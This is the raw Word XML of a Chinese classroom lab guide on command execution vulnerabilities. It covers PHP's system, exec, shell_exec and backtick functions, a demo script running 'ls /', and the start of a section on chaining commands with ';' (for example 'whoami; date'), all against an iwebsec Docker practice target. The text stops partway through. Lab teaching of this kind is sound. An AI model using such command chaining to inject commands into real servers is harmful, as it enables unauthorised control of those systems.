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6DC67" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="等线"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="heading_0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>命令执行漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.1+5.2 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>详细操作文档</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61330179" w14:textId="71E544F1" w:rsidR="00803D08" w:rsidRDefault="009F7E91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b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>适用环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：主机直接访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iwebsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Docker)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b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>靶机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="001266F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.44.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A54504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文档用途</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：课堂教学、实验操作、实验报告直接提交</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AEB60F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26D8031" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="heading_1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>一、项目概述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="7A0A821C" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="heading_2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漏洞定义</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="1C4D67A1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命令执行漏洞是指</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005003DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r w:rsidRPr="005003DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>应用接收用户输入后未做过滤与转义</w:t>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，直接将可控数据拼接到系统命令中执行，导致攻击者可在服务器上执行任意系统命令，进而控制服务器、读取敏感数据、植入木马等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BAED16" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="heading_3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学习目标</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="05BDB5C8" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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掌握</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>中常见命令执行函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E90AAA1" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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掌握</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>常用命令连接符的用法与执行规则。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539DA5D1" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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理解命令执行漏洞成因、危害与利用方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D23E16" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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掌握漏洞复现方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B42155" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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掌握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escapeshellarg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>防御函数的使用与原理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5070CD0F" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="heading_4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实验环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="144BB5E1" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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攻击机：本机主机（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Windows/macOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66950D6F" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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靶机：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iwebsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>容器）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAAEBB7" w14:textId="22AE99A7" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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IP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[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001266F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.44.128</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>](</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001266F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.44.128</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B501BC" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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实验目录：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/var/www/html/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>test_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3E32DD" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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漏洞目录：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/var/www/html/exec/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2961DB32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26F141F" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="heading_5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>第一部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>命令执行函数与命令连接符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="50963B48" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="heading_6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5.1.1 PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>常用命令执行函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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803D08" w14:paraId="00F2377A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30253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函数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4EB72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功能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B97164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输出特点</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00803D08" w14:paraId="68E3A9E3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DD06F" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>system(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A6A07C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执行系统命令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A71817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直接输出到页面</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00803D08" w14:paraId="4634AE01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A419D5" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>exec(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E8F05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执行系统命令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E0FD5D" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>不</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>自动输出，存入数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00803D08" w14:paraId="21BD42D6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BB9B5" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>shell_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exec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>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60C9B9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执行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Shell </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>命令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F8A97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返回完整字符串</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00803D08" w14:paraId="13AF24FB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3F3CF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反引号</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
              </w:rPr>
              <w:t>`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C01E3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同</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="等线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sz w:val="22"/>
              </w:rPr>
              <w:t>shell_exec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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FCC19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返回字符串</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A107EAE" w14:textId="77777777" w:rsidR="00803D08" w:rsidRDefault="009F7E91">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="heading_7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1.2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>testExec.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>源码与逐行审计</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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3D8455CC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FF2C2A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定义命令：查看根目录文件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>$command = 'ls /';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exec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>执行，结果存入数组</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>exec($command, $output,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return_var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>echo "exec</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>执行结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>: 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print_r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($output);</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>echo "&lt;/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br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&gt;";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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>执行，返回字符串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$output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($command);</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>echo "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执行结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>: " . $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output .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 xml:space="preserve"> "&lt;/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br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&gt;";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system </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>直接执行并输出</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>echo "system</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>执行结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:";</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>system($command);</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>echo "&lt;/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br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&gt;";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反引号执行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>$output = `$command`;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>echo "</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>反引号执行结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>: " . $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output .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 xml:space="preserve"> "&lt;/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br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&gt;";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分号</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> ; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>依次执行多条命令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multiple_commands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whoami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; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>date';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>echo "</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>分号</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>执行结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
